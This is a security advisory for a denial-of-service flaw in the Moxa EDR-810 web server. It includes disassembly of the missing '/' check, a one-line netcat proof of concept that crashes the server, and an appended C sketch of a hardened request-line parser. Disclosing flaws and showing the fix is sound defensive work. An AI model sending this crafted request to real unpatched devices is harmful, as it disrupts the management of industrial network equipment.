An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability.
Moxa EDR-810 V4.1 build 17030317
https://www.moxa.com/product/EDR-810.htm
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-20 - Improper Input Validation
When the web server processes an HTTP request, it checks whether the first character of the URI is a / (0x2F). If the first character is not 0x2F, the service will crash.
.text:00061460 LDR R3, [R11,#s1]
.text:00061464 LDRB R3, [R3]
.text:00061468 CMP R3, #0x2F ; '/'
.text:0006146C BEQ loc_61454
echo 'GET A HTTP/1.1' | nc -nv 192.168.127.254 80
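A hardened form of the check described above, as an added example in C that is not code from the advisory or from the Moxa firmware. The function name, the status codes and the choice to accept only targets that begin with / are assumptions of this sketch; it shows a request-line parser that answers a target such as A with a 400-style result instead of passing it to later code.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical status codes for this sketch. */
enum { REQ_OK = 200, REQ_BAD = 400 };

/* Validate a request line and locate an origin-form target inside it.
 * Every pointer is checked before it is dereferenced, so a target such
 * as "A" yields REQ_BAD instead of reaching code that assumes a '/'. */
int parse_request_line(const char *line, const char **target, size_t *len)
{
    if (line == NULL || target == NULL || len == NULL)
        return REQ_BAD;

    /* The method ends at the first space and must be non-empty. */
    const char *sp1 = strchr(line, ' ');
    if (sp1 == NULL || sp1 == line)
        return REQ_BAD;

    /* The target runs to the next space, which must exist. */
    const char *uri = sp1 + 1;
    const char *sp2 = strchr(uri, ' ');
    if (sp2 == NULL || sp2 == uri)
        return REQ_BAD;

    /* The check the advisory describes: first byte must be '/' (0x2F). */
    if (uri[0] != '/')
        return REQ_BAD;

    /* A version token must follow the target. */
    if (strncmp(sp2 + 1, "HTTP/", 5) != 0)
        return REQ_BAD;

    *target = uri;
    *len = (size_t)(sp2 - uri);
    return REQ_OK;
}

int main(void)
{
    /* Constructed request lines; the second has the shape shown in the advisory. */
    const char *samples[] = { "GET /index.html HTTP/1.1", "GET A HTTP/1.1", "GET" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *t = NULL;
        size_t n = 0;
        printf("%-26s -> %d\n", samples[i], parse_request_line(samples[i], &t, &n));
    }
    return 0;
}
```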